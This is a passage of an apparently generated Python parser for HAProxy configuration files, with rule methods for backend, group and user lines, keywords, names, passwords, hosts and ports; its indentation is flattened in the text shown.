address8 = FAILURE
index5 = self._offset
address8 = self._read_backend_condition()
if address8 is FAILURE:
address8 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
index6 = self._offset
address9 = self._read_comment_text()
if address9 is FAILURE:
address9 = TreeNode(self._input[index6:index6], index6)
self._offset = index6
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
address10 = self._read_line_break()
if address10 is not FAILURE:
elements0.append(address10)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BackendLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['backend_line'][index0] = (address0, self._offset)
return address0
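# Descriptive note (added): group_line parses 'group' and a group name, with
# an optional 'users' clause; the member names themselves are presumably
# picked up by the following optional value element.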
def _read_group_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['group_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 5]
if chunk0 == 'group':
address2 = TreeNode(self._input[self._offset:self._offset + 5], self._offset)
self._offset = self._offset + 5
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"group"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_group_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address7 = FAILURE
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 5]
if chunk1 == 'users':
address7 = TreeNode(self._input[self._offset:self._offset + 5], self._offset)
self._offset = self._offset + 5
else:
address7 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"users"')
if address7 is not FAILURE:
elements1.append(address7)
address8 = FAILURE
address8 = self._read_whitespace()
if address8 is not FAILURE:
elements1.append(address8)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address6 = FAILURE
else:
address6 = TreeNode19(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address9 = FAILURE
index4 = self._offset
address9 = self._read_value()
if address9 is FAILURE:
address9 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
index5 = self._offset
address10 = self._read_comment_text()
if address10 is FAILURE:
address10 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address10 is not FAILURE:
elements0.append(address10)
address11 = FAILURE
address11 = self._read_line_break()
if address11 is not FAILURE:
elements0.append(address11)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = GroupLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['group_line'][index0] = (address0, self._offset)
return address0
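# Descriptive note (added): user_line parses 'user' <name>, then either
# 'password' or 'insecure-password' followed by the password token, an
# optional 'groups' clause, and the usual optional value/comment tail.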
def _read_user_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['user_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 4]
if chunk0 == 'user':
address2 = TreeNode(self._input[self._offset:self._offset + 4], self._offset)
self._offset = self._offset + 4
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"user"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_user_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 8]
if chunk1 == 'password':
address6 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"password"')
if address6 is FAILURE:
self._offset = index2
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 17]
if chunk2 == 'insecure-password':
address6 = TreeNode(self._input[self._offset:self._offset + 17], self._offset)
self._offset = self._offset + 17
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"insecure-password"')
if address6 is FAILURE:
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_whitespace()
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_password()
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_whitespace()
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
index3 = self._offset
index4, elements1 = self._offset, []
address11 = FAILURE
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 6]
if chunk3 == 'groups':
address11 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address11 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"groups"')
if address11 is not FAILURE:
elements1.append(address11)
address12 = FAILURE
address12 = self._read_whitespace()
if address12 is not FAILURE:
elements1.append(address12)
else:
elements1 = None
self._offset = index4
else:
elements1 = None
self._offset = index4
if elements1 is None:
address10 = FAILURE
else:
address10 = TreeNode21(self._input[index4:self._offset], index4, elements1)
self._offset = self._offset
if address10 is FAILURE:
address10 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address10 is not FAILURE:
elements0.append(address10)
address13 = FAILURE
index5 = self._offset
address13 = self._read_value()
if address13 is FAILURE:
address13 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address13 is not FAILURE:
elements0.append(address13)
address14 = FAILURE
index6 = self._offset
address14 = self._read_comment_text()
if address14 is FAILURE:
address14 = TreeNode(self._input[index6:index6], index6)
self._offset = index6
if address14 is not FAILURE:
elements0.append(address14)
address15 = FAILURE
address15 = self._read_line_break()
if address15 is not FAILURE:
elements0.append(address15)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = UserLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['user_line'][index0] = (address0, self._offset)
return address0
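# Descriptive note (added): config_line is the generic fallback. A negative
# lookahead first rejects lines starting with a section keyword ('defaults',
# 'global', 'userlist', 'listen', 'frontend', 'backend'); only then are a
# keyword, an optional value, an optional comment and the line break consumed.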
def _read_config_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['config_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'defaults':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"defaults"')
if address2 is FAILURE:
self._offset = index3
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 6]
if chunk1 == 'global':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"global"')
if address2 is FAILURE:
self._offset = index3
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 8]
if chunk2 == 'userlist':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"userlist"')
if address2 is FAILURE:
self._offset = index3
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 6]
if chunk3 == 'listen':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"listen"')
if address2 is FAILURE:
self._offset = index3
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 8]
if chunk4 == 'frontend':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"frontend"')
if address2 is FAILURE:
self._offset = index3
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 7]
if chunk5 == 'backend':
address2 = TreeNode(self._input[self._offset:self._offset + 7], self._offset)
self._offset = self._offset + 7
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"backend"')
if address2 is FAILURE:
self._offset = index3
self._offset = index2
if address2 is FAILURE:
address2 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_keyword()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_whitespace()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
index4 = self._offset
address5 = self._read_value()
if address5 is FAILURE:
address5 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index5 = self._offset
address6 = self._read_comment_text()
if address6 is FAILURE:
address6 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_line_break()
if address7 is not FAILURE:
elements0.append(address7)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ConfigLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['config_line'][index0] = (address0, self._offset)
return address0
def _read_comment_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['comment_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_comment_text()
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_line_break()
if address3 is not FAILURE:
elements0.append(address3)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = CommentLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['comment_line'][index0] = (address0, self._offset)
return address0
def _read_blank_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['blank_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_line_break()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BlankLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['blank_line'][index0] = (address0, self._offset)
return address0
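# Descriptive note (added): comment_text matches a '#' followed by a run of
# characters (as defined by the char rule), then uses a positive lookahead to
# require, without consuming, the line break that terminates the comment.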
def _read_comment_text(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['comment_text'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '#':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"#"')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
address3 = self._read_char()
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address4 = FAILURE
index3 = self._offset
address4 = self._read_line_break()
self._offset = index3
if address4 is not FAILURE:
address4 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['comment_text'][index0] = (address0, self._offset)
return address0
def _read_line_break(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['line_break'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_1.search(chunk0):
address0 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\n]')
self._cache['line_break'][index0] = (address0, self._offset)
return address0
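# Descriptive note (added): keyword allows an optional 'errorfile' or
# 'timeout' prefix (each followed by whitespace) before one or more
# characters from [a-z0-9-_.], so compound directives such as
# 'timeout connect' come back as a single keyword node.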
def _read_keyword(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['keyword'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address2 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 9]
if chunk0 == 'errorfile':
address2 = TreeNode(self._input[self._offset:self._offset + 9], self._offset)
self._offset = self._offset + 9
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"errorfile"')
if address2 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 7]
if chunk1 == 'timeout':
address2 = TreeNode(self._input[self._offset:self._offset + 7], self._offset)
self._offset = self._offset + 7
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"timeout"')
if address2 is FAILURE:
self._offset = index4
if address2 is not FAILURE:
elements1.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements1.append(address3)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address1 = FAILURE
else:
address1 = Keyword(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address1 is FAILURE:
address1 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address1 is not FAILURE:
elements0.append(address1)
address4 = FAILURE
remaining0, index5, elements2, address5 = 1, self._offset, [], True
while address5 is not FAILURE:
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 is not None and Grammar.REGEX_2.search(chunk2):
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-z0-9\\-\\_\\.]')
if address5 is not FAILURE:
elements2.append(address5)
remaining0 -= 1
if remaining0 <= 0:
address4 = TreeNode(self._input[index5:self._offset], index5, elements2)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['keyword'][index0] = (address0, self._offset)
return address0
def _read_server_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['server_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_3.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['server_name'][index0] = (address0, self._offset)
return address0
def _read_acl_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['acl_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_4.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['acl_name'][index0] = (address0, self._offset)
return address0
def _read_backend_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_5.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['backend_name'][index0] = (address0, self._offset)
return address0
def _read_group_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['group_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_6.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['group_name'][index0] = (address0, self._offset)
return address0
def _read_user_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['user_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_7.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['user_name'][index0] = (address0, self._offset)
return address0
def _read_password(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['password'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_8.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^#\\n]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['password'][index0] = (address0, self._offset)
return address0
def _read_backend_condition(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_condition'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_9.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^#\\n]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['backend_condition'][index0] = (address0, self._offset)
return address0
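# Descriptive note (added): service_address is host, an optional ':'
# separator, and a port; port is itself a zero-or-more digit run, so a bare
# host (or a host followed by ':' and no digits) still yields a
# ServiceAddress node.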
def _read_service_address(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['service_address'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_host()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_10.search(chunk0):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[:]')
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_port()
if address3 is not FAILURE:
elements0.append(address3)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ServiceAddress(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['service_address'][index0] = (address0, self._offset)
return address0
def _read_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_ipv4_host()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_dns_host()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_wildcard_host()
if address0 is FAILURE:
self._offset = index1
self._cache['host'][index0] = (address0, self._offset)
return address0
def _read_port(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['port'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_11.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['port'][index0] = (address0, self._offset)
return address0
def _read_ipv4_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['ipv4_host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
remaining0, index2, elements1, address2 = 1, self._offset, [], True
while address2 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_12.search(chunk0):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address2 is not FAILURE:
elements1.append(address2)
remaining0 -= 1
if remaining0 <= 0:
address1 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address1 = FAILURE
if address1 is not FAILURE:
elements0.append(address1)
address3 = FAILURE
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == '.':
address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"."')
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
remaining1, index3, elements2, address5 = 1, self._offset, [], True
while address5 is not FAILURE:
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 is not None and Grammar.REGEX_13.search(chunk2):
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address5 is not FAILURE:
elements2.append(address5)
remaining1 -= 1
if remaining1 <= 0:
address4 = TreeNode(self._input[index3:self._offset], index3, elements2)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements0.append(address4)
address6 = FAILURE
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 1]
if chunk3 == '.':
address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"."')
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
remaining2, index4, elements3, address8 = 1, self._offset, [], True
while address8 is not FAILURE:
chunk4 = None
